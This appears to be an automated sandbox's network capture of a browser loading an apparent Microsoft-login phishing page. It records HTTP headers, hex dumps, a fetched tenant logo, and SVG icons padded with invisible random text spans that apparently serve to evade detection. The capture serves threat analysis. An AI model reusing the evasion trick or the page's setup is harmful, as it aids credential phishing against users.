                                                                                                                                                                                    2024-01-26 13:41:55 UTC18INData Raw: 9a d5 bc 1f b4 d2 bf c5 38 a4 a6 2f d1 4a 66 73 62 79
                                                                                                                                                                                    Data Ascii: 8/Jfsby
                                                                                                                                                                                    2024-01-26 13:41:55 UTC16383INData Raw: 2e 31 81 b0 6f be ea 4a a3 c5 2a 97 d3 ca c1 6a 6b 49 69 ff 00 b9 9e 8a df 81 cd 64 17 4e 25 be ee 45 35 23 a4 03 3f 78 92 48 ca f2 ee d2 43 4d a5 9c 6b 9b 6b 18 e5 e4 bb 45 e2 93 d6 cd ca 50 49 2f 63 6d b9 70 4d 0d 3d 7d 45 d4 f0 e5 0d 4d 7c d5 0e 94 19 2a 9c 1c d7 13 b1 e7 f9 2c 7b 15 af c4 2a 2a 77 c1 0f ec aa 30 e9 5f 23 c9 94 b8 ef cb 75 ac bf c5 5b ab de e7 7e cf 83 7e 44 92 76 56 e5 f1 2a fd 2b b0 d6 42 d1 d8 34 ec b5 d1 a0 aa a5 ba 33 79 c7 ab 6f fb 9e 4d bf c4 36 b9 73 04 d1 bc 1b 7f 89 7f 10 d9 df 7a b7 b5 a0 63 d0 4b 83 be 7e ca b7 5b bc 40 ab 1e 5b 6f d4 31 39 c7 77 b1 87 2d 1f 55 a2 7f f5 1b 8a 1a cc 06 c4 d1 cb 68 8a aa 3e 3d e2 29 35 35 f5 90 53 bf 98 22 2f f7 d9 6c 54 29 35 f3 33 34 bc 7a 7d b8 2f d0 eb d0 70 4f 17 55 51 c6 5b c6 d0 0a bc
                                                                                                                                                                                    Data Ascii: .1oJ*jkIidN%E5#?xHCMkkEPI/cmpM=}EM|*,{**w0_#u[~~DvV*+B43yoM6szcK~[@[o19w-Uh>=)55S"/lT)534z}/pOUQ[
                                                                                                                                                                                    2024-01-26 13:41:55 UTC16383INData Raw: 8f 25 cb 26 d5 51 e2 6d 63 dd ff 00 4f 41 b8 1d d4 7d 67 1e 71 05 6c 66 26 c2 22 63 b9 e9 0a 2e 68 7c ef 2c 34 32 2d 27 3e 91 cd 5a aa 74 b1 31 b1 46 fc 02 77 c7 35 1d 89 7a 1d 52 66 3b e5 af a8 c3 de c7 64 1c e7 96 4f ba b6 23 ad 68 d0 df 48 e8 33 c9 5e 1e 7f 95 97 3d ce c9 c6 4f 45 90 da 77 b9 c0 82 4e 07 35 2f 2e 2b d0 b7 cc 9b f5 2c b2 9e a5 cd cc 93 8f a1 55 b2 9d e5 db c8 7d d6 53 69 48 39 e6 3a ac c8 a9 1f 20 25 ac 27 b6 01 39 52 c2 20 f9 7c b3 11 b4 71 16 8d 4f 7e 7d 8a ca 8e 1a 71 e9 30 b9 de e4 a9 5a 5b 1d c6 a8 81 05 05 43 fd 9b 19 ca 9f a5 e0 6e 21 aa 8b f7 36 79 5b 9e b2 7a 7f 54 6d 2e c9 24 6a d1 e8 66 d1 c4 d0 54 cd 92 29 aa 2e d4 f1 b2 30 ed 4f 19 c0 e8 16 cb 43 e1 af 10 c9 bc 91 53 d3 6f bf 98 fc ad be cd c0 12 5b 2a 5b 3c d5 b1 12 1b f6
                                                                                                                                                                                    Data Ascii: %&QmcOA}gqlf&"c.h|,42-'>Zt1Fw5zRf;dO#hH3^=OEwN5/.+,U}SiH9: %'9R |qO~}q0Z[Cn!6y[zTm.$jfT).0OCSo[*[<
                                                                                                                                                                                    2024-01-26 13:41:55 UTC2INData Raw: f3 fb
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:55 UTC16383INData Raw: c9 5e ef aa cf e7 c7 d0 d3 f0 93 f5 66 d9 35 5d 3c 4d 2e 7d 4b 07 d5 46 d4 5e a1 19 64 4d 74 9f 4d 8f d5 6b ef 20 91 a4 67 e6 aa 8d c1 a0 97 38 02 4e 06 57 3c f9 3f 42 5f 0d 08 f6 c9 11 74 32 e7 14 e7 48 ee 54 35 eb ce ac 85 91 9f dd e5 c1 a0 0e b9 2b 25 b5 94 8d 8c bb cf 60 c1 23 9f 50 ac 0a a8 aa e7 8b 41 cb 04 9c fb e1 5d 4b b1 cd 15 5d e5 c6 0f 05 c1 45 4d 45 0b 21 8a 36 b3 4f b6 e4 a8 da aa 93 ab 20 9d 94 ad 6c e2 4c 9c b4 37 ae 54 04 a6 32 f7 3c 07 11 d4 15 ef 6f 8c 57 27 cf ed 9c df 06 3b e4 9e a1 d1 c6 c9 1d 1b b2 4e 47 60 aa 75 c6 48 9c f6 d4 e4 81 81 a9 a1 5a 6c ce f8 97 16 c7 e8 1b 6c b0 e6 12 4c e7 00 32 4e e4 2a dc d3 e4 6c 69 e0 bd 25 63 24 c9 8a 42 41 df 25 47 d4 ce 5c d2 75 10 19 f6 9d d7 0a 99 23 63 09 73 dc 5a 79 73 ea b1 0b a2 63 43 aa
                                                                                                                                                                                    Data Ascii: ^f5]<M.}KF^dMtMk g8NW<?B_t2HT5+%`#PA]K]EME!6O lL7T2<oW';NG`uHZllL2N*li%c$BA%G\u#csZyscC
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1INData Raw: 20
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:55 UTC16383INData Raw: 87 48 c3 88 eb ec b1 e8 ad 8d 6c 5f 1b 71 cc 50 37 76 b7 ef 3f e6 a8 ac ba 49 52 f6 b2 26 96 44 dd 9b 18 0b 24 ee 9c de 20 7a 50 d1 d5 52 cc 91 99 5f 50 2a 07 92 c7 10 ce e7 99 2a c3 20 90 5b 9e 61 8f 73 9d 24 77 52 16 bb 04 b2 b7 e2 6a f2 c6 11 90 ce aa 52 bb ca 83 cb a6 63 03 59 13 73 80 39 92 bc db ee e5 42 3c 96 aa 97 6f 83 53 b6 5b e4 8f 5b 1e 4c 98 1a 88 76 fb ad ae d7 41 4f 04 cd 73 8e 87 1d f4 e3 62 b0 e1 02 28 5e e7 39 ad 1d 4f 75 91 1d 44 f3 4c c1 4e d1 8f e3 77 4f a2 cb 75 b9 e0 9c 22 97 24 cd 4d 4c 54 cc 05 d2 31 99 ef cd 46 4d 2c f5 2d 76 96 b9 ad ee e0 ab 8e 88 fc 4f 9b 29 32 3f 3f e2 3f 9f fb 2b d2 3d c4 16 e3 aa c7 b7 8c 16 e7 26 0c 50 18 bd 58 d4 e3 d4 af 64 7f 33 c8 fe 8b 24 b3 d1 ea 3b 2c 19 dc d6 83 fc 94 a3 14 81 87 51 21 24 00 32 3a
                                                                                                                                                                                    Data Ascii: Hl_qP7v?IR&D$ zPR_P** [as$wRjRcYs9B<oS[[LvAOsb(^9OuDLNwOu"$MLT1FM,-vO)2???+=&PXd3$;,Q!$2:
                                                                                                                                                                                    2024-01-26 13:41:55 UTC16383INData Raw: 0b 83 5d cb 20 2d 11 b4 ed 64 51 c8 e6 e5 ee 39 c7 65 be 3e a6 8c 52 48 0d 5c 4e 1a 77 1a b9 ad 3e 79 69 c3 8b 9d 3c 4d 6f fa 97 9d 6b 5b d3 3d 7d 2c 5e d6 8c 58 e9 e2 6b d8 fc 6c 5c 1d 9e a7 75 d0 29 a1 d6 d6 d5 6c ed 7b b4 8e 4b 4b 8d f4 52 7a df 55 10 e8 06 ae 4a 6e 8a ff 00 1d 15 30 a7 86 56 bc 7d dd 4c 2e c1 54 42 e5 5b 7f 72 3a dd 13 d4 c5 63 b4 6d 91 c2 5d 80 47 35 21 04 20 37 61 b0 51 34 97 fb 4c f4 e1 d2 49 2c 33 01 bb 0c 4e 00 9f 6d 95 f8 b8 b2 c6 1e d8 43 aa 0c 8e 38 0d 10 3b 73 f3 c2 bb cc 52 5d 9e 47 c2 b8 3d b2 44 bb 0e 89 dc 1a dd da 70 0a cc 6b 99 e8 63 c0 06 43 81 95 aa cd c4 d2 9a 27 d6 db 6c 75 d5 6d 7b 9c 01 f2 f4 8c 8e 7e eb ca 0b bf 10 5c 70 c9 78 6e 46 96 e3 d4 e9 03 5b bf 7f 97 35 e7 3b 11 eb 55 a7 cb e7 a3 32 e9 65 71 e2 ca a9 0d
                                                                                                                                                                                    Data Ascii: ] -dQ9e>RH\Nw>yi<Mok[=},^Xkl\u)l{KKRzUJn0V}L.TB[r:cm]G5! 7aQ4LI,3NmC8;sR]G=DpkcC'lum{~\pxnF[5;U2eq
                                                                                                                                                                                    2024-01-26 13:41:55 UTC16383INData Raw: 5a fe e6 88 d7 bb d0 80 b7 5d 6d 10 d8 67 b6 5c 68 64 99 af 7e b6 ba 27 60 f2 ea 54 0b a4 80 89 74 d3 33 49 76 c5 c4 97 34 74 0b 3a 1a 56 be 4f 2d cd cb 46 f9 fe 4a 65 94 5c 39 1d 2f 98 e8 ea 9d 54 72 0c 60 8d 03 b1 ca db be 10 6d ac f2 77 c9 79 5c 1a b4 73 e9 cb 34 73 59 11 55 cb ea 05 ce 6b 4f 23 95 2c 29 6d ae 38 6c 45 87 dc 9e 6a c4 b4 70 c6 f2 06 08 e8 bb e6 c5 f1 82 c5 a6 c9 8f 18 d2 43 9c 33 9d d6 53 24 2e 73 8b 01 68 ce 40 ea a8 c0 d1 a7 1f 22 ae 53 b0 64 f2 c6 39 15 09 63 b2 0b 4c f2 5f 85 cc 7c 63 27 07 9e 02 bc cc 67 4e 33 9e a5 5a 82 26 92 1b 9c 15 29 0d b9 ef 66 bc 1c 60 10 7b ac f3 e1 95 ba 71 d9 6a 2d 03 1b 1c f7 ca d8 68 ad fe 63 7c c2 fc 05 62 96 cb 3c b8 79 89 e7 49 03 d2 dc 83 d9 4c 41 47 34 00 c4 e6 96 96 bb 53 95 b0 84 fb c7 05 13 51
                                                                                                                                                                                    Data Ascii: Z]mg\hd~'`Tt3Iv4t:VO-FJe\9/Tr`mwy\s4sYUkO#,)m8lEjpC3S$.sh@"Sd9cL_|c'gN3Z&)f`{qj-hc|b<yILAG4SQ


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    48192.168.2.1649791172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC439OUTGET /VyRsmGftiIlOxrabXBIOtQtS/3ETwEspTY8j HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:55 UTC714INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gv%2FVZvh%2FEal%2BSloJM2HVzhCs17iG7g4p0Yoyy1OBpcpbQyyBi%2FWpwyVimsmOk4CpW0%2F7ZOktRrDrEj0XVoZQc7sdKMX5tPjWvCsHZB2Km4bA34JjhqiM9q4LpKus94u1JhODXPx5RpUyAF%2Fiezg7MmWa6Zw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d1acc3a44dc-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    49192.168.2.1649784152.195.19.974436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC707OUTGET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=636973066507737181 HTTP/1.1
                                                                                                                                                                                    Host: aadcdn.msauthimages.net
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:55 UTC688INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                    Content-MD5: ovPnmA+85tTVrd3pieQrUQ==
                                                                                                                                                                                    Content-Type: image/*
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Etag: 0x8D6FBA110C925ED
                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2019 08:17:30 GMT
                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: cee2b396-901e-0028-205d-505b8d000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    Content-Length: 3779
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:55 UTC3779INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 23 00 c3 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 08 05 06 07 04 01 02 03 ff c4 00 46 10 00 01 03 03 04 00 03 04 05 07 06 0f 00 00 00 00 01 02 03 04 05 06 11 00 07 12 21 08 13 31 22 32 41 51 14 15 61 71 81 16 17 33 52
                                                                                                                                                                                    Data Ascii: JFIF,,C!"$"$C#"F!1"2AQaq3R


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    50192.168.2.1649787172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC451OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6ggGbKMm5p/3zCyDRX4zxDo HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:55 UTC718INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dwmQU8ELm4I9vYA6AiCFe4DyNKdWbYgu522LU5lJYOL%2BEwJKB44pnday5WYJqdzoADhKOW7pd1F9agZxs8jlpeL9aJRfwfmCO2p2Mm5UA%2F3FLLE0VQTorXUUFFvELBnP5GsEaD5D2gWKTP1APeS2K3fkLmc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d1afc1753bd-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:55 UTC651INData Raw: 34 31 33 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 65 62 30 34 54 61 41 6f 55 31 73 45 76 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                                                                                                                                                    Data Ascii: 413<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">eb04TaAoU1sEv</span><span style="display: inli
                                                                                                                                                                                    2024-01-26 13:41:55 UTC399INData Raw: 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22
                                                                                                                                                                                    Data Ascii: 11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"
                                                                                                                                                                                    2024-01-26 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    51192.168.2.1649789172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC451OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6lp36DM7bxL/6YuqRWrsKjk HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:55 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv%2FnmImw8yyro8hnweEeFNeTKFilkhvdbBIZpLwKnuE5wFkhxBTQCCfMnV6tPeW4MLEr6vc2d3u0yU%2BesRCeQgvuvPu0xncMjvp1l6BJoezq1PHjUxr1DP%2FpnDHmsnyDoGf6WavH%2BGdmgNDXjnJla5Zhp1A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d1b0d98453e-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:55 UTC647INData Raw: 39 39 30 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 5a 4a 6e 37 7a 6a 34 7a 37 73 6a 35 32 30 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c
                                                                                                                                                                                    Data Ascii: 990<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">ZJn7zj4z7sj520</text><span style="display: inl
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6c 45 71 49 31 77 43 6d 35 4c 4c 33 4e 70 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30 36 2c 30 2c 30 2c 31 2d 32 2e 32
                                                                                                                                                                                    Data Ascii: 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">lEqI1wCm5LL3Np</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.2
                                                                                                                                                                                    2024-01-26 13:41:55 UTC439INData Raw: 35 2d 2e 34 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70
                                                                                                                                                                                    Data Ascii: 5-.422,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01p
                                                                                                                                                                                    2024-01-26 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    52192.168.2.1649788172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
